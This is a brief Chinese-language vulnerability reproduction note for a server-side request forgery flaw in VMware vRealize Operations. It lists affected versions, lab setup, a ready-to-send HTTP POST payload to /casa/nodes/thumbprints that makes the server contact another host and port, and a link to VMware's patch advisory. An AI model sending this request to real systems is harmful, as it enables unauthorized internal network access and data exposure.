影响版本

VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0

VMware Cloud Foundation  4.x、3.x

vRealize Suite Lifecycle Manager 8.x

 

 

 

环境搭建

 

下载地址

https://my.vmware.com/group/vmware/patch#search

下载完之后双击。然后导入虚拟机

进行访问 https://192.168.1.100/

设置为新环境后即可

 

漏洞复现

 

构建数据包并发送

POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.1.100
Content-Type: application/json;charset=UTF-8
Content-Length: 22

["192.168.1.103:6666"]

 

修复建议

 

官方已提供固件补丁包，可以访问以下连接下载

https://www.vmware.com/security/advisories/VMSA-2021-0004.html